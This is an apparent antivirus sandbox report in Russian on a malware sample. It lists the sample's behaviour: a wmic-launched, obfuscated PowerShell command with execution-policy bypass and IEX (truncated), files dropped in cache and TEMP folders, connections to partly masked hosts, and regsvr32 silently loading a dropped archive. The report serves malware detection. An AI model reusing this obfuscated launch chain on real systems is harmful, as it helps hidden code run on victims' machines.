Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\wbem\wmic.exe' pROcesS call CREATE "pOwershElL -noproF -NOniNTER -Win 01 -ExeCUTIoNpOL byPasS iex("\"&('s'+'al') ('utf-'+'8') ('New'+'-Obje'+'ct');& ( `${S`H`elLid}[1]+`${shEL`l`ID}[13]+'X')(.('u...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\temp1_fp_13.0.0.182_archive
Сетевая активность
TCP
- 'ub###ium.com':443
- '15#.#0.255.85':443
UDP
- DNS ASK pe###otis.com
- DNS ASK ub###ium.com
Другое
Запускает на исполнение
- '<SYSTEM32>\regsvr32.exe' -s %TEMP%\Temp1_fp_13.0.0.182_archive.
